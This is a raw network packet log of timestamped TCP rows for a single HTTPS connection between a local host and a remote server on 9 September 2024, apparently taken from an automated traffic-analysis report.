Sep 9, 2024 08:55:10.556957960 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.556963921 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.572223902 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.572253942 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.572283983 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.572294950 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.572355986 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.586497068 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.586596966 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.586627007 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.586642981 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.586653948 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.586694002 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.586698055 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.588386059 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.588470936 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.588476896 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.593378067 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.593444109 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.593451023 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.602185011 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.602266073 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.602278948 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.604970932 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.605045080 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.605056047 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.609175920 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.609261036 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.609275103 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.614094019 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.614193916 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.614203930 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.618932962 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.619023085 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.619034052 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.623333931 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.623385906 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.623393059 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.628091097 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.628139973 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.628145933 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.634196997 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.634246111 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.634253979 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.637490988 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.637545109 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.637551069 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.641869068 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.641917944 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.641923904 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.646235943 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.646291971 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.646301031 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.650347948 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.650393963 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.650397062 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.650403976 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.650445938 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.654534101 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.658441067 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.658468962 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.658495903 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.658502102 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.658549070 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.662256956 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.667365074 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.667388916 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.667408943 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.667416096 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.667464972 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.669738054 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.673053026 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.673079967 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.673104048 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.673109055 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.673151016 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.676462889 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.680075884 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.680099964 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.680126905 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.680134058 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.680206060 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.682343960 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.684401035 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.684449911 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.684454918 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.686769962 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.686794996 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.686815023 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.686821938 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.686858892 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.688744068 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.690903902 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.690931082 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.690953970 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.690959930 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.691000938 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.696235895 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.698338032 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.698364019 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.698383093 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.698390007 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.698427916 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.699093103 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.699966908 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.699995041 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.700018883 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.700025082 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.700062037 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.702059031 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.703779936 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.703808069 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.703826904 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.703835011 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.703890085 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.705864906 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.708056927 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.708091021 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.708107948 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.708112955 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.708148956 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.710268974 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.712301970 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.712347031 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.712352037 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.714420080 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.714467049 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.714472055 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.716603994 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.716653109 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.716659069 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.718630075 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.718688011 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.718693972 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.718698025 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.718736887 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.724540949 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.726016998 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.726043940 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.726059914 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.726067066 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.726115942 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.727751970 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.729016066 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.729043007 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.729064941 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.729069948 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.729108095 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.729907990 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.731102943 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.731154919 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.731159925 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.732692003 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.732717991 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.732744932 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.732752085 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.732789993 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.734549999 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.736630917 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.736661911 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.736675024 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.736680031 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.736716986 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.736721039 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.738497972 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.738586903 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.738591909 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.740576982 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.740632057 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.740636110 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.742547989 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.742595911 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.742600918 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.744277954 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.744326115 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.744330883 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.746161938 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.746208906 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.746213913 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.747982025 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.748027086 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.748037100 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.749914885 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.749986887 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.749993086 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.751866102 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.751909971 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.751915932 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.755781889 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.755824089 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.755827904 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.758584023 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.758636951 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.758646011 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.760618925 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.760680914 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.760687113 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.761102915 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.761143923 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.761148930 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.762439013 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.762484074 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.762490034 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.762588978 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.762629986 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.762634039 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.764060974 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.764106035 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.764110088 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.766078949 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.766123056 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.766130924 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.768661022 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.768707991 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.768712997 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.770445108 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.770488024 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.770493984 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.771085978 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.771150112 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.771155119 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.772691011 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.772739887 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.772746086 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.774101973 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.774151087 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.774156094 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.775614977 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.775660992 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.775666952 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.777053118 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.777097940 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.777103901 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.778676987 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.778702021 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.778732061 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.778738022 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.778775930 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.779951096 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.782933950 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.782968044 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.782993078 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.782998085 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.783003092 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.783037901 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.783149958 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.783191919 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.785787106 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.785885096 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.785912991 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.785926104 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.785932064 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.785969973 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.788738966 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.788790941 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.788814068 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.788837910 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.788849115 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.788887978 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.796896935 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.797051907 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.797115088 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.797117949 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.797127008 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.797168016 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.797173023 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.800513029 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.800539970 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.800563097 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.800573111 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.800612926 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.800718069 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.800765991 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.800791025 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.800811052 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.800817013 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.800857067 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.805469036 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.805655003 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.805684090 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.805700064 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.805705070 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.805742025 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.805747032 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.814460993 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.814491034 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.814521074 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.814543009 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.814554930 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.814567089 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.814584017 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.814625025 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.814630032 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.818080902 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.818109989 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.818136930 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.818161964 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.818166018 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.818176031 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.818180084 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.818217039 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.818222046 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.823396921 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.823441982 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.823465109 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.823496103 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.823504925 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.823543072 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.823688984 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.823740959 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.823746920 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.831562042 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.831590891 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.831645966 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.831653118 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.831681013 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.831698895 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.831703901 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.831743956 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.831748962 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.835386038 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.835436106 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.835442066 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.835481882 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.835513115 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.835520029 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.835525036 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.835561037 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.835580111 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.839349985 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.839399099 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.839406013 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.839456081 CEST	443	49701	142.250.181.225	192.168.2.7
